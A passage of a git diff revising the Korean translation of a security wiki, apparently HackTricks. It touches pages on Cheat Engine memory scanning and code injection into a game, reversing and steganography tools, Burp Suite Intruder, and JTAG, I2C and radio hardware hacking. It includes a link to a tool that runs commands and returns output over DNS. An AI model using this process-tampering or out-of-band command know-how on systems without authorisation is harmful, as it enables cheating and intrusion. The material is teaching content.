-&#xNAN;_여전히 여러 값이 남아 있다면, 그 값을 다시 수정할 수 있는 작업을 수행하고 또 다른 "다음 스캔"을 수행하여 주소를 필터링합니다._
+&#xNAN;_여전히 여러 값이 남아 있다면, 그 값을 다시 수정할 수 있는 작업을 수행하고 또 다른 "다음 스캔"을 수행하여 주소를 필터링하세요._
 
-### 알 수 없는 값, 알려진 변경
+### 알려지지 않은 값, 알려진 변경
 
-값을 **모르지만** **변경하는 방법**(변경의 값 포함)을 알고 있는 경우, 숫자를 찾을 수 있습니다.
+값을 **모르지만** **변경하는 방법**(변경의 값 포함)을 알고 있는 경우, 숫자를 검색할 수 있습니다.
 
-먼저 "**알 수 없는 초기 값**" 유형의 스캔을 수행합니다:
+먼저 "**알려지지 않은 초기 값**" 유형의 스캔을 수행합니다:
 
 ![](<../../images/image (890).png>)
 
-그런 다음 값을 변경하고 **값이 어떻게 변경되었는지**(제 경우에는 1 감소함) 표시한 후 **다음 스캔**을 수행합니다:
+그런 다음 값을 변경하고 **값이 어떻게 변경되었는지**(제 경우에는 1 감소됨)를 표시한 후 **다음 스캔**을 수행합니다:
 
 ![](<../../images/image (371).png>)
 
@@ -75,19 +75,19 @@ Cheat Engine은 **100에서 새로운 값으로 변경된** **값**을 검색합
 
 값을 찾으면 이를 수정할 수 있습니다.
 
-많은 **가능한 변경**이 있으며, 결과를 필터링하기 위해 이 **단계를 원하는 만큼** 수행할 수 있습니다:
+**많은 가능한 변경**이 있으며, 결과를 필터링하기 위해 이 **단계를 원하는 만큼** 수행할 수 있습니다:
 
 ![](<../../images/image (574).png>)
 
 ### 랜덤 메모리 주소 - 코드 찾기
 
-지금까지 값이 저장된 주소를 찾는 방법을 배웠지만, **게임의 다른 실행에서 그 주소가 메모리의 다른 위치에 있을 가능성이 높습니다**. 따라서 항상 그 주소를 찾는 방법을 알아봅시다.
+지금까지 우리는 값을 저장하는 주소를 찾는 방법을 배웠지만, **게임의 다른 실행에서 그 주소가 메모리의 다른 위치에 있을 가능성이 높습니다**. 따라서 항상 그 주소를 찾는 방법을 알아봅시다.
 
-언급된 몇 가지 요령을 사용하여 현재 게임이 중요한 값을 저장하고 있는 주소를 찾습니다. 그런 다음(원하는 경우 게임을 중지하고) 찾은 **주소**에서 **우클릭**하고 "**이 주소에 접근하는 것을 찾기**" 또는 "**이 주소에 쓰는 것을 찾기**"를 선택합니다:
+언급된 몇 가지 트릭을 사용하여 현재 게임이 중요한 값을 저장하는 주소를 찾습니다. 그런 다음(원하는 경우 게임을 중지하고) 찾은 **주소**에서 **우클릭**하고 "**이 주소에 접근하는 것을 찾기**" 또는 "**이 주소에 쓰는 것을 찾기**"를 선택합니다:
 
 ![](<../../images/image (1067).png>)
 
-**첫 번째 옵션**은 이 **주소**를 **사용하는 코드의 부분**을 아는 데 유용합니다(게임의 코드를 수정할 수 있는 위치를 아는 데 유용합니다).\
+**첫 번째 옵션**은 이 **주소를 사용하는** **코드의 부분**을 아는 데 유용합니다(이는 **게임의 코드를 수정할 수 있는 위치를 아는 것**과 같은 더 많은 것에 유용합니다).\
 **두 번째 옵션**은 더 **구체적**이며, 이 경우 **이 값이 어디에서 쓰이는지** 아는 데 더 도움이 됩니다.
 
 이 옵션 중 하나를 선택하면 **디버거**가 프로그램에 **첨부**되고 새로운 **빈 창**이 나타납니다. 이제 **게임을 플레이**하고 **값을 수정**합니다(게임을 재시작하지 않고). **창**은 **값을 수정하는 주소**로 **채워져야** 합니다:
@@ -98,7 +98,7 @@ Cheat Engine은 **100에서 새로운 값으로 변경된** **값**을 검색합
 
 ![](<../../images/image (1057).png>)
 
-따라서 이제 코드를 수정하여 숫자에 영향을 주지 않거나 긍정적인 방식으로 항상 영향을 주도록 할 수 있습니다.
+따라서 이제 코드를 수정하여 숫자에 영향을 주지 않거나 항상 긍정적인 방식으로 영향을 줄 수 있습니다.
 
 ### 랜덤 메모리 주소 - 포인터 찾기
 
@@ -117,7 +117,7 @@ Cheat Engine은 **100에서 새로운 값으로 변경된** **값**을 검색합
 
 ![](<../../images/image (990).png>)
 
-이제 "포인터" 체크 박스를 클릭하고 텍스트 상자에 찾은 주소를 추가합니다(이 시나리오에서 이전 이미지에서 찾은 주소는 "Tutorial-i386.exe"+2426B0입니다):
+이제 "포인터" 체크 박스를 클릭하고 텍스트 상자에 찾은 주소를 추가합니다(이 시나리오에서 이전 이미지에서 찾은 주소는 "Tutorial-i386.exe"+2426B0이었습니다):
 
 ![](<../../images/image (392).png>)
 
@@ -131,18 +131,18 @@ Cheat Engine은 **100에서 새로운 값으로 변경된** **값**을 검색합
 
 ### 코드 주입
 
-코드 주입은 대상 프로세스에 코드 조각을 주입한 다음 코드 실행을 자신의 코드로 리라우팅하는 기술입니다(예: 점수를 주는 대신 빼기).
+코드 주입은 대상 프로세스에 코드 조각을 주입한 다음, 코드 실행을 자신의 코드로 리라우팅하는 기술입니다(예: 점수를 주는 대신 빼기).
 
 따라서 플레이어의 생명에서 1을 빼는 주소를 찾았다고 가정해 보겠습니다:
 
 ![](<../../images/image (203).png>)
 
 **디스어셈블 코드**를 얻기 위해 Show disassembler를 클릭합니다.\
-그런 다음 **CTRL+a**를 클릭하여 자동 조립 창을 호출하고 _**Template --> Code Injection**_을 선택합니다.
+그런 다음 **CTRL+a**를 클릭하여 자동 조립 창을 호출하고 _**Template --> Code Injection**_을 선택합니다:
 
 ![](<../../images/image (902).png>)
 
-수정하려는 **명령어의 주소**를 입력합니다(보통 자동으로 채워집니다):
+**수정하려는 명령어의 주소**를 입력합니다(보통 자동으로 채워집니다):
 
 ![](<../../images/image (744).png>)
 
@@ -150,7 +150,7 @@ Cheat Engine은 **100에서 새로운 값으로 변경된** **값**을 검색합
 
 ![](<../../images/image (944).png>)
 
-따라서 "**newmem**" 섹션에 새로운 어셈블리 코드를 삽입하고 "**originalcode**"에서 원래 코드를 제거합니다(실행되지 않도록 하려면). 이 예제에서 주입된 코드는 1을 빼는 대신 2점을 추가합니다:
+따라서 "**newmem**" 섹션에 새로운 어셈블리 코드를 삽입하고 "**originalcode**"에서 원래 코드를 제거합니다(실행되지 않도록 하려면). 이 예제에서는 주입된 코드가 1을 빼는 대신 2점을 추가합니다:
 
 ![](<../../images/image (521).png>)
 
diff --git a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
index f81f17cff..75f687474 100644
--- a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
+++ b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
@@ -1,6 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-기본적으로 이 도구는 특정 조건을 만족해야 하는 변수의 값을 찾는 데 도움을 줄 것이며, 수작업으로 계산하는 것은 매우 번거로울 것입니다. 따라서 Z3에 변수가 만족해야 하는 조건을 지정하면 가능한 경우 일부 값을 찾아줍니다.
+기본적으로 이 도구는 특정 조건을 만족해야 하는 변수의 값을 찾는 데 도움을 줄 것이며, 수작업으로 계산하는 것은 매우 번거로울 것입니다. 따라서 Z3에 변수가 만족해야 하는 조건을 지정하면 가능한 경우 일부 값을 찾아냅니다.
 
 **일부 텍스트와 예시는 [https://ericpony.github.io/z3py-tutorial/guide-examples.htm](https://ericpony.github.io/z3py-tutorial/guide-examples.htm)에서 추출되었습니다.**
 
@@ -94,7 +94,7 @@ solve(ULT(x, 0))
 ```
 ## Functions
 
-**해석된 함수**는 산술과 같은 것으로, **함수 +**는 **고정된 표준 해석**을 가지고 있습니다(두 숫자를 더합니다). **비해석 함수**와 상수는 **최대 유연성**을 가지며, 함수나 상수에 대한 **제약**과 **일관된** **모든 해석**을 허용합니다.
+**해석된 함수**는 산술과 같은 것으로, **함수 +**는 **고정된 표준 해석**을 가지고 있습니다(두 숫자를 더합니다). **비해석 함수**와 상수는 **최대 유연성**을 가지며, 이는 함수나 상수에 대한 **제약**과 **일관된** **모든 해석**을 허용합니다.
 
 예: f가 x에 두 번 적용되면 다시 x가 되지만, f가 x에 한 번 적용되면 x와 다릅니다.
 ```python
diff --git a/src/reversing/reversing-tools/README.md b/src/reversing/reversing-tools/README.md
index 6ad0330cc..ce80fb27b 100644
--- a/src/reversing/reversing-tools/README.md
+++ b/src/reversing/reversing-tools/README.md
@@ -6,8 +6,8 @@
 
 ## 온라인 도구
 
-- Wasm을 Wat으로 **디컴파일**하려면 [Wabt의 wasm2wat 데모](https://webassembly.github.io/wabt/demo/wasm2wat/index.html)에서 제공하는 도구가 유용합니다.
-- Wat을 다시 Wasm으로 **컴파일**하려면 [Wabt의 wat2wasm 데모](https://webassembly.github.io/wabt/demo/wat2wasm/)를 사용하면 됩니다.
+- Wasm을 Wat으로 **디컴파일**하려면 [Wabt의 wasm2wat 데모](https://webassembly.github.io/wabt/demo/wasm2wat/index.html)를 사용하면 유용합니다.
+- Wat을 다시 Wasm으로 **컴파일**하려면 [Wabt의 wat2wasm 데모](https://webassembly.github.io/wabt/demo/wat2wasm/)가 목적에 맞습니다.
 - 또 다른 디컴파일 옵션은 [web-wasmdec](https://wwwg.github.io/web-wasmdec/)에서 찾을 수 있습니다.
 
 ## 소프트웨어 솔루션
@@ -21,7 +21,7 @@
 
 - [ILSpy](https://github.com/icsharpcode/ILSpy), 이 도구는 [Visual Studio Code용 플러그인](https://github.com/icsharpcode/ilspy-vscode)도 제공하여 크로스 플랫폼 사용이 가능합니다.
 - **디컴파일**, **수정**, **재컴파일** 작업에 대해 [dnSpy](https://github.com/0xd4d/dnSpy/releases)를 강력히 추천합니다. 메서드를 **우클릭**하고 **Modify Method**를 선택하면 코드 변경이 가능합니다.
-- [JetBrains의 dotPeek](https://www.jetbrains.com/es-es/decompiler/)도 .Net 어셈블리를 디컴파일하는 또 다른 대안입니다.
+- [JetBrains의 dotPeek](https://www.jetbrains.com/es-es/decompiler/)은 .Net 어셈블리를 디컴파일하는 또 다른 대안입니다.
 
 ## DNSpy로 디버깅 및 로깅 향상
 
@@ -82,9 +82,9 @@ Java 바이트코드를 디컴파일하기 위해 다음 도구가 매우 유용
 - jmp2it [컴파일된 버전](https://github.com/adamkramer/jmp2it/releases/)
 - **Cutter**는 GUI 기반의 쉘코드 에뮬레이션 및 검사를 제공하며, 파일로서의 쉘코드 처리와 직접 쉘코드 처리의 차이를 강조합니다.
 
-### 디오브퓨케이션 및 분석
+### 디오브퓨스케이션 및 분석
 
-- **scdbg**는 쉘코드 기능 및 디오브퓨케이션 기능에 대한 통찰력을 제공합니다.
+- **scdbg**는 쉘코드 기능 및 디오브퓨스케이션 기능에 대한 통찰력을 제공합니다.
 %%%bash
 scdbg.exe -f shellcode # 기본 정보
 scdbg.exe -f shellcode -r # 분석 보고서
@@ -98,17 +98,17 @@ scdbg.exe -f shellcode /foff 0x0000004D # 오프셋에서 실행
 
 ## **Movfuscator**
 
-- 모든 명령어를 `mov`로 대체하는 오브퓨케이터입니다.
+- 모든 명령어를 `mov`로 대체하는 오브퓨스케이터입니다.
 - 유용한 리소스에는 [YouTube 설명](https://www.youtube.com/watch?v=2VF_wPkiBJY) 및 [PDF 슬라이드](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf)가 포함됩니다.
-- **demovfuscator**는 movfuscator의 오브퓨케이션을 역으로 수행할 수 있으며, `libcapstone-dev` 및 `libz3-dev`와 같은 종속성이 필요하고 [keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md)을 설치해야 합니다.
+- **demovfuscator**는 movfuscator의 오브퓨스케이션을 역으로 수행할 수 있으며, `libcapstone-dev` 및 `libz3-dev`와 같은 종속성이 필요하고 [keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md)을 설치해야 합니다.
 
 ## **Delphi**
 
-- Delphi 바이너리에 대해서는 [IDR](https://github.com/crypto2011/IDR)를 추천합니다.
+- Delphi 바이너리의 경우 [IDR](https://github.com/crypto2011/IDR)를 추천합니다.
 
 # 강좌
 
 - [https://github.com/0xZ0F/Z0FCourse_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse_ReverseEngineering)
-- [https://github.com/malrev/ABD](https://github.com/malrev/ABD) \(바이너리 디오브퓨케이션\)
+- [https://github.com/malrev/ABD](https://github.com/malrev/ABD) \(바이너리 디오브퓨스케이션\)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/reversing/word-macros.md b/src/reversing/word-macros.md
index 1795b5089..4820cd732 100644
--- a/src/reversing/word-macros.md
+++ b/src/reversing/word-macros.md
@@ -4,8 +4,8 @@
 
 ### Junk Code
 
-**사용되지 않는 정크 코드**를 찾아내는 것은 매우 일반적이며, 이는 매크로의 리버싱을 더 어렵게 만듭니다.\
-예를 들어, 다음 이미지에서 항상 참이 될 수 없는 If가 사용되어 일부 정크 및 쓸모없는 코드를 실행하는 것을 볼 수 있습니다.
+**사용되지 않는 쓰레기 코드**를 찾아내는 것은 매우 일반적이며, 이는 매크로의 리버싱을 더 어렵게 만듭니다.\
+예를 들어, 다음 이미지에서 항상 참이 될 수 없는 If가 사용되어 일부 쓰레기 및 쓸모없는 코드를 실행하는 것을 볼 수 있습니다.
 
 ![](<../images/image (369).png>)
 
diff --git a/src/stego/stego-tricks.md b/src/stego/stego-tricks.md
index 7c04821fe..51416f7f9 100644
--- a/src/stego/stego-tricks.md
+++ b/src/stego/stego-tricks.md
@@ -6,7 +6,7 @@
 
 ### **Binwalk**
 
-임베디드 숨겨진 파일과 데이터를 찾기 위한 바이너리 파일 검색 도구입니다. `apt`를 통해 설치되며, 소스는 [GitHub](https://github.com/ReFirmLabs/binwalk)에서 확인할 수 있습니다.
+임베디드 숨겨진 파일과 데이터를 찾기 위한 이진 파일 검색 도구입니다. `apt`를 통해 설치되며, 소스는 [GitHub](https://github.com/ReFirmLabs/binwalk)에서 확인할 수 있습니다.
 ```bash
 binwalk file # Displays the embedded data
 binwalk -e file # Extracts the data
@@ -100,7 +100,7 @@ zsteg는 PNG 및 BMP 파일에서 숨겨진 데이터를 발견하는 데 특화
 
 ### **StegoVeritas and Stegsolve**
 
-**stegoVeritas**는 메타데이터를 확인하고, 이미지 변환을 수행하며, LSB 브루트 포싱을 적용하는 등 다양한 기능을 제공합니다. 전체 옵션 목록은 `stegoveritas.py -h`를 사용하고, 모든 검사를 실행하려면 `stegoveritas.py stego.jpg`를 사용하세요.
+**stegoVeritas**는 메타데이터를 확인하고, 이미지 변환을 수행하며, LSB 무차별 대입 공격을 적용하는 등 다양한 기능을 제공합니다. 전체 옵션 목록은 `stegoveritas.py -h`를 사용하고, 모든 검사를 실행하려면 `stegoveritas.py stego.jpg`를 사용하세요.
 
 **Stegsolve**는 이미지를 통해 숨겨진 텍스트나 메시지를 드러내기 위해 다양한 색상 필터를 적용합니다. [GitHub에서](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve) 사용할 수 있습니다.
 
@@ -118,7 +118,7 @@ Stegpy는 PNG, BMP, GIF, WebP 및 WAV와 같은 형식을 지원하여 이미지
 
 ### **Pngcheck for PNG File Analysis**
 
-PNG 파일을 분석하거나 그 진위를 검증하려면:
+PNG 파일을 분석하거나 그 진위를 확인하려면:
 ```bash
 apt-get install pngcheck
 pngcheck stego.png
@@ -165,7 +165,7 @@ Deepsound는 AES-256을 사용하여 사운드 파일 내의 정보를 암호화
 
 ### **Sonic Visualizer**
 
-Sonic Visualizer는 오디오 파일의 시각적 및 분석적 검사를 위한 귀중한 도구로, 다른 방법으로는 감지할 수 없는 숨겨진 요소를 드러낼 수 있습니다. 더 많은 정보는 [공식 웹사이트](https://www.sonicvisualiser.org/)를 방문하세요.
+Sonic Visualizer는 오디오 파일의 시각적 및 분석적 검사를 위한 귀중한 도구로, 다른 방법으로는 감지할 수 없는 숨겨진 요소를 드러낼 수 있습니다. [공식 웹사이트](https://www.sonicvisualiser.org/)를 방문하여 더 많은 정보를 확인하세요.
 
 ### **DTMF Tones - Dial Tones**
 
diff --git a/src/todo/burp-suite.md b/src/todo/burp-suite.md
index ef2c28e12..f1ab9edde 100644
--- a/src/todo/burp-suite.md
+++ b/src/todo/burp-suite.md
@@ -4,9 +4,9 @@
 
 - **간단한 목록:** 각 줄에 항목이 포함된 목록
 - **런타임 파일:** 런타임에 읽는 목록(메모리에 로드되지 않음). 큰 목록을 지원하기 위해.
-- **대소문자 수정:** 문자열 목록에 일부 변경 사항 적용(변경 없음, 소문자, 대문자, 고유명사 - 첫 글자 대문자, 나머지는 소문자 -, 고유명사 - 첫 글자 대문자, 나머지는 그대로 유지 -).
+- **대소문자 수정:** 문자열 목록에 일부 변경 적용(변경 없음, 소문자, 대문자, 고유명사 - 첫 글자 대문자 및 나머지 소문자-, 고유명사 - 첫 글자 대문자 및 나머지는 그대로-).
 - **숫자:** Z 단계 또는 무작위로 X에서 Y까지 숫자 생성.
-- **브루트 포스:** 문자 집합, 최소 및 최대 길이.
+- **브루트 포서:** 문자 집합, 최소 및 최대 길이.
 
 [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : DNS 요청을 통해 burpcollab에 명령을 실행하고 출력을 가져오는 페이로드.
 
diff --git a/src/todo/cookies-policy.md b/src/todo/cookies-policy.md
index a724661a0..adf45337c 100644
--- a/src/todo/cookies-policy.md
+++ b/src/todo/cookies-policy.md
@@ -1,6 +1,6 @@
 # 쿠키 정책
 
-최종 업데이트: 2023년 4월 2일
+최종 업데이트: 2023년 2월 4일
 
 ### 소개
 
@@ -11,7 +11,7 @@
 * book.hacktricks.xyz
 * cloud.hacktricks.xyz
 
-이 웹사이트 중 하나를 사용함으로써, 귀하는 이 쿠키 정책에 따라 쿠키 사용에 동의하는 것입니다. 동의하지 않으시면, 브라우저 설정에서 쿠키를 비활성화하거나 저희 웹사이트 사용을 자제해 주시기 바랍니다.
+이 웹사이트 중 하나를 사용함으로써, 귀하는 이 쿠키 정책에 따라 쿠키 사용에 동의하게 됩니다. 동의하지 않으시면, 브라우저 설정에서 쿠키를 비활성화하시거나 저희 웹사이트 사용을 자제해 주시기 바랍니다.
 
 ### 쿠키란 무엇인가요?
 
@@ -30,11 +30,11 @@
 
 ### 제3자 쿠키
 
-저희 쿠키 외에도, 웹사이트 사용 통계 보고, 광고 제공 및 소셜 미디어 공유 버튼 활성화를 위해 제3자 쿠키를 사용할 수 있습니다. 제3자 쿠키의 사용은 해당 개인 정보 보호 정책에 따릅니다.
+저희 쿠키 외에도, 웹사이트 사용 통계 보고, 광고 제공 및 소셜 미디어 공유 버튼 활성화를 위해 제3자 쿠키를 사용할 수 있습니다. 제3자 쿠키의 사용은 해당 쿠키의 개인정보 보호정책에 따릅니다.
 
 쿠키 관리
 
-대부분의 웹 브라우저는 설정을 통해 쿠키를 관리할 수 있도록 허용합니다. 귀하는 장치에서 쿠키의 사용을 차단, 삭제 또는 제한할 수 있습니다. 그러나 쿠키를 비활성화하면 저희 웹사이트의 기능과 성능에 영향을 미칠 수 있습니다.
+대부분의 웹 브라우저는 설정을 통해 쿠키를 관리할 수 있도록 허용합니다. 귀하는 장치에서 쿠키 사용을 차단, 삭제 또는 제한할 수 있습니다. 그러나 쿠키를 비활성화하면 저희 웹사이트의 기능과 성능에 영향을 미칠 수 있습니다.
 
 이 쿠키 정책의 변경
 
diff --git a/src/todo/hardware-hacking/README.md b/src/todo/hardware-hacking/README.md
index 9e12a1b7f..b7f941da3 100644
--- a/src/todo/hardware-hacking/README.md
+++ b/src/todo/hardware-hacking/README.md
@@ -27,15 +27,15 @@ JTAGulator와 같은 도구를 사용할 때 이러한 명령을 접할 수 있
 - 테스트 모드 선택 (**TMS**) 입력 TMS는 **유한 상태 기계**를 제어합니다. 클럭의 각 비트에서 장치의 JTAG TAP 컨트롤러는 TMS 핀의 전압을 확인합니다. 전압이 특정 임계값 이하이면 신호는 낮은 것으로 간주되어 0으로 해석되고, 전압이 특정 임계값 이상이면 신호는 높은 것으로 간주되어 1로 해석됩니다.
 - 테스트 데이터 입력 (**TDI**) TDI는 **스캔 셀을 통해 칩으로 데이터를 전송하는 핀**입니다. 각 공급업체는 이 핀을 통한 통신 프로토콜을 정의할 책임이 있으며, JTAG는 이를 정의하지 않습니다.
 - 테스트 데이터 출력 (**TDO**) TDO는 **칩에서 데이터를 전송하는 핀**입니다.
-- 테스트 리셋 (**TRST**) 입력 선택적 TRST는 유한 상태 기계를 **알려진 좋은 상태**로 리셋합니다. 또는 TMS가 5개의 연속 클럭 사이클 동안 1로 유지되면 TRST 핀과 동일한 방식으로 리셋을 호출합니다. 그래서 TRST는 선택적입니다.
+- 테스트 리셋 (**TRST**) 입력 선택적 TRST는 유한 상태 기계를 **알려진 좋은 상태**로 리셋합니다. 또는 TMS가 연속적으로 5개의 클럭 사이클 동안 1로 유지되면 TRST 핀과 동일한 방식으로 리셋을 호출합니다. 그래서 TRST는 선택적입니다.
 
 때때로 PCB에서 이러한 핀에 마킹이 되어 있는 것을 찾을 수 있습니다. 다른 경우에는 **찾아야 할 수도 있습니다**.
 
 ### JTAG 핀 식별
 
-JTAG 포트를 감지하는 가장 빠르고 비싼 방법은 **JTAGulator**를 사용하는 것입니다. 이는 이 목적을 위해 특별히 제작된 장치입니다 (비록 **UART 핀 배치**도 감지할 수 있습니다).
+JTAG 포트를 감지하는 가장 빠르고 비싼 방법은 **JTAGulator**를 사용하는 것입니다. 이는 이 목적을 위해 특별히 제작된 장치입니다 (또한 **UART 핀 배치**도 감지할 수 있습니다).
 
-이 장치는 보드 핀에 연결할 수 있는 **24개 채널**을 가지고 있습니다. 그런 다음 **IDCODE** 및 **BYPASS** 경계 스캔 명령을 보내는 모든 가능한 조합에 대해 **BF 공격**을 수행합니다. 응답을 받으면 각 JTAG 신호에 해당하는 채널을 표시합니다.
+이 장치는 보드 핀에 연결할 수 있는 **24개 채널**을 가지고 있습니다. 그런 다음 **IDCODE** 및 **BYPASS** 경계 스캔 명령을 보내며 가능한 모든 조합에 대해 **BF 공격**을 수행합니다. 응답을 받으면 각 JTAG 신호에 해당하는 채널을 표시합니다.
 
 더 저렴하지만 훨씬 느린 JTAG 핀 배치를 식별하는 방법은 Arduino 호환 마이크로컨트롤러에 로드된 [**JTAGenum**](https://github.com/cyphunk/JTAGenum/)을 사용하는 것입니다.
 
diff --git a/src/todo/hardware-hacking/i2c.md b/src/todo/hardware-hacking/i2c.md
index 96ba63e50..f4bcec09f 100644
--- a/src/todo/hardware-hacking/i2c.md
+++ b/src/todo/hardware-hacking/i2c.md
@@ -43,7 +43,7 @@ Any key to exit
 #Press space
 Found 0 errors.
 ```
-이전 명령줄에서 0개의 오류가 발견되었다고 표시된 것을 볼 수 있습니다. 이는 구매 후 또는 펌웨어를 플래시한 후에 작동하는지 확인하는 데 매우 유용합니다.
+이전 명령줄에서 0개의 오류가 발견되었다고 표시된 것을 볼 수 있습니다. 이는 구매 후 또는 펌웨어를 플래시한 후에 작동하는지 아는 데 매우 유용합니다.
 
 버스 파이레와 연결하려면 문서를 참조할 수 있습니다:
 
@@ -54,7 +54,7 @@ Found 0 errors.
 ![](<../../images/image (964).png>)
 
 버스 파이레와 대화하기 위해 Tera Term을 사용하여 파이레 버스 COM 포트에 연결했습니다. 설정 --> 직렬 포트 --> 속도를 115200으로 설정했습니다.\
-다음 통신에서는 I2C와 대화하기 위해 버스 파이레를 준비하는 방법과 메모리에서 읽고 쓰는 방법을 찾을 수 있습니다(주석은 "#"을 사용하여 나타나며, 통신에서 해당 부분을 기대하지 마십시오):
+다음 통신에서는 버스 파이레를 I2C와 대화하도록 준비하는 방법과 메모리에서 읽고 쓰는 방법을 찾을 수 있습니다(주석은 "#"을 사용하여 나타나며, 통신에서 해당 부분을 기대하지 마십시오):
 ```bash
 # Check communication with buspirate
 i
diff --git a/src/todo/hardware-hacking/jtag.md b/src/todo/hardware-hacking/jtag.md
index 7f1372a3c..9a4f5bcc1 100644
--- a/src/todo/hardware-hacking/jtag.md
+++ b/src/todo/hardware-hacking/jtag.md
@@ -5,12 +5,12 @@
 ## JTAGenum
 
 [**JTAGenum** ](https://github.com/cyphunk/JTAGenum)은 Raspberry PI 또는 Arduino와 함께 사용하여 알 수 없는 칩의 JTAG 핀을 찾는 도구입니다.\
-**Arduino**에서는 **2번에서 11번 핀을 JTAG에 속할 가능성이 있는 10개의 핀에 연결**합니다. Arduino에 프로그램을 로드하면 모든 핀을 브루트포스하여 JTAG에 속하는 핀과 각 핀의 종류를 찾습니다.\
-**Raspberry PI**에서는 **1번에서 6번 핀**만 사용할 수 있습니다(6핀, 따라서 각 잠재적 JTAG 핀을 테스트하는 데 더 느리게 진행됩니다).
+**Arduino**에서는 **핀 2에서 11까지를 JTAG에 속할 가능성이 있는 10핀에 연결**합니다. Arduino에 프로그램을 로드하면 모든 핀을 브루트포스하여 JTAG에 속하는 핀과 각 핀을 찾으려고 시도합니다.\
+**Raspberry PI**에서는 **핀 1에서 6**만 사용할 수 있습니다(6핀, 따라서 각 잠재적 JTAG 핀을 테스트하는 데 더 느리게 진행됩니다).
 
 ### Arduino
 
-Arduino에서 케이블을 연결한 후(핀 2에서 11을 JTAG 핀에, Arduino GND를 기본 보드 GND에 연결), **Arduino에 JTAGenum 프로그램을 로드**하고 Serial Monitor에서 **`h`**(도움 요청 명령)를 보내면 도움말을 볼 수 있습니다:
+Arduino에서 케이블을 연결한 후(핀 2에서 11까지를 JTAG 핀에, Arduino GND를 기본 보드 GND에 연결), **Arduino에 JTAGenum 프로그램을 로드**하고 Serial Monitor에서 **`h`**(도움 요청 명령)를 보내면 도움말을 볼 수 있습니다:
 
 ![](<../../images/image (939).png>)
 
diff --git a/src/todo/hardware-hacking/radio.md b/src/todo/hardware-hacking/radio.md
index 3132f8487..c8ac910bc 100644
--- a/src/todo/hardware-hacking/radio.md
+++ b/src/todo/hardware-hacking/radio.md
@@ -4,12 +4,12 @@
 
 ## SigDigger
 
-[**SigDigger** ](https://github.com/BatchDrake/SigDigger)는 GNU/Linux 및 macOS용 무료 디지털 신호 분석기로, 알려지지 않은 라디오 신호의 정보를 추출하도록 설계되었습니다. 다양한 SDR 장치를 SoapySDR를 통해 지원하며, FSK, PSK 및 ASK 신호의 조정 가능한 복조, 아날로그 비디오 디코딩, 버스트 신호 분석 및 아날로그 음성 채널 청취(모두 실시간)를 허용합니다.
+[**SigDigger** ](https://github.com/BatchDrake/SigDigger)는 GNU/Linux 및 macOS용 무료 디지털 신호 분석기로, 알려지지 않은 라디오 신호의 정보를 추출하도록 설계되었습니다. SoapySDR를 통해 다양한 SDR 장치를 지원하며, FSK, PSK 및 ASK 신호의 조정 가능한 복조를 허용하고, 아날로그 비디오를 디코드하며, 버스트 신호를 분석하고 아날로그 음성 채널을 실시간으로 청취할 수 있습니다.
 
 ### Basic Config
 
 설치 후 몇 가지 설정을 고려할 수 있습니다.\
-설정(두 번째 탭 버튼)에서 **SDR 장치**를 선택하거나 **파일을 선택**하여 읽고 조정할 주파수 및 샘플 속도(PC가 지원하는 경우 최대 2.56Msps 권장)를 설정할 수 있습니다.\\
+설정(두 번째 탭 버튼)에서 **SDR 장치**를 선택하거나 **파일을 선택**하여 읽고 조정할 주파수와 샘플 속도(PC가 지원하는 경우 최대 2.56Msps 권장)를 설정할 수 있습니다.\\
 
 ![](<../../images/image (245).png>)
 
@@ -18,49 +18,49 @@ GUI 동작에서 PC가 지원하는 경우 몇 가지 기능을 활성화하는
 ![](<../../images/image (472).png>)
 
 > [!NOTE]
-> PC가 신호를 캡처하지 못하는 경우 OpenGL을 비활성화하고 샘플 속도를 낮추는 것을 시도해 보세요.
+> PC가 신호를 캡처하지 못하는 경우 OpenGL을 비활성화하고 샘플 속도를 낮추는 것을 고려해 보세요.
 
 ### Uses
 
-- 신호의 일부를 **캡처하고 분석**하려면 "Push to capture" 버튼을 필요한 만큼 유지하십시오.
+- 신호의 일부를 **캡처하고 분석하기 위해** "Push to capture" 버튼을 필요한 만큼 유지합니다.
 
 ![](<../../images/image (960).png>)
 
-- SigDigger의 **튜너**는 **더 나은 신호를 캡처하는 데 도움**을 줍니다(하지만 신호를 저하시킬 수도 있습니다). 이상적으로는 0에서 시작하여 **신호의 개선보다** **노이즈**가 **더 커질 때까지** **점점 더 크게** 조정하십시오.
+- SigDigger의 **튜너**는 **더 나은 신호를 캡처하는 데 도움**을 줍니다(하지만 신호를 저하시킬 수도 있습니다). 이상적으로는 0에서 시작하여 **신호의 개선보다** **노이즈**가 **더 커질 때까지** **크기를 늘려갑니다**.
 
 ![](<../../images/image (1099).png>)
 
 ### Synchronize with radio channel
 
-[**SigDigger** ](https://github.com/BatchDrake/SigDigger)로 듣고 싶은 채널과 동기화하고 "Baseband audio preview" 옵션을 설정하며, 전송되는 모든 정보를 얻기 위해 대역폭을 설정한 후 노이즈가 실제로 증가하기 시작하기 전의 수준으로 튜너를 설정하십시오:
+[**SigDigger** ](https://github.com/BatchDrake/SigDigger)로 듣고 싶은 채널과 동기화하고 "Baseband audio preview" 옵션을 설정하며, 전송되는 모든 정보를 얻기 위해 대역폭을 설정한 후, 노이즈가 실제로 증가하기 시작하기 전의 수준으로 튜너를 설정합니다:
 
 ![](<../../images/image (585).png>)
 
 ## Interesting tricks
 
 - 장치가 정보의 버스트를 전송할 때, 일반적으로 **첫 번째 부분은 프리앰블**이므로 **정보를 찾지 못하더라도 걱정할 필요가 없습니다** **또는 그곳에 오류가 있는 경우**.
-- 정보 프레임에서 일반적으로 **서로 잘 정렬된 다양한 프레임을 찾아야 합니다**:
+- 정보 프레임에서는 일반적으로 **서로 잘 정렬된 다양한 프레임을 찾아야 합니다**:
 
